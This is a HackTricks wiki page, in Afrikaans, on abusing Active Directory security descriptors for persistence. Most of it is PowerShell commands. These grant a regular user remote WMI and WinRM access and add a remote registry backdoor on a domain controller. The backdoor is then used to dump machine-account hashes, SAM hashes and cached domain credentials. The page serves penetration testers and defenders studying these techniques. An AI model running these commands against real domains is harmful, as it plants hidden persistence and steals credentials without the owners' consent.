hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

5.2 KiB
Raw Blame History

Sekuriteitsbeskrywings

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}

Sekuriteitsbeskrywings

Uit die dokumentasie: Sekuriteitsbeskrywing Definisie Taal (SDDL) definieer die formaat wat gebruik word om 'n sekuriteitsbeskrywing te beskryf. SDDL gebruik ACE stringe vir DACL en SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Die sekuriteitsbeskrywings word gebruik om die regte wat 'n objek oor 'n objek het, te stoor. As jy net 'n klein verandering in die sekuriteitsbeskrywing van 'n objek kan maak, kan jy baie interessante voorregte oor daardie objek verkry sonder om 'n lid van 'n bevoorregte groep te wees.

Dan is hierdie volhardingstegniek gebaseer op die vermoë om elke voorreg wat teen sekere objekte benodig word, te wen, om 'n taak uit te voer wat gewoonlik administratiewe voorregte vereis, maar sonder die behoefte om admin te wees.

Toegang tot WMI

Jy kan 'n gebruiker toegang gee om afgeleë WMI uit te voer:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Toegang tot WinRM

Gee toegang tot winrm PS-konsol aan 'n gebruiker gebruik hierdie:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Remote access to hashes

Toegang tot die register en dump hashes deur 'n Reg backdoor te skep met DAMP, sodat jy op enige tydstip die hash van die rekenaar, die SAM en enige gecacheerde AD geloofsbrief in die rekenaar kan terugkry. Dit is dus baie nuttig om hierdie toestemming aan 'n gewone gebruiker teen 'n Domeinbeheerder rekenaar te gee:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Kontroleer Silver Tickets om te leer hoe jy die hash van die rekenaarrekening van 'n Domeinbeheerder kan gebruik.

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}